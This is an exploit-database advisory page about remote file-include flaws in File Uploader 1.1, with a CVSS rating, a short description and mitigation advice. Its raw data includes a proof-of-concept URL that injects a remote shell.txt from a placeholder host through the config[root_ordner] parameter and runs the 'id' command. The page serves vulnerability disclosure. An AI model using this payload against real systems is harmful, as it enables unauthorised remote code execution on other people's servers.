header-logo
Suggest Exploit
vendor:
File Uploader
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: File Uploader
Affected Version From: 1.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

File Uploader Multiple Remote File-Include Vulnerabilities

The File Uploader application is prone to multiple remote file-include vulnerabilities due to insufficient input sanitization. Exploiting these vulnerabilities can allow an attacker to compromise the application and the underlying system, and may also enable other types of attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input sanitization and validation mechanisms in the File Uploader application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25253/info
 
File Uploader is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
File Uploader 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/datei.php?config[root_ordner]=http://www.example2.com/shell.txt?&cmd=id

Navigation

Suggest Exploit

Services By CQR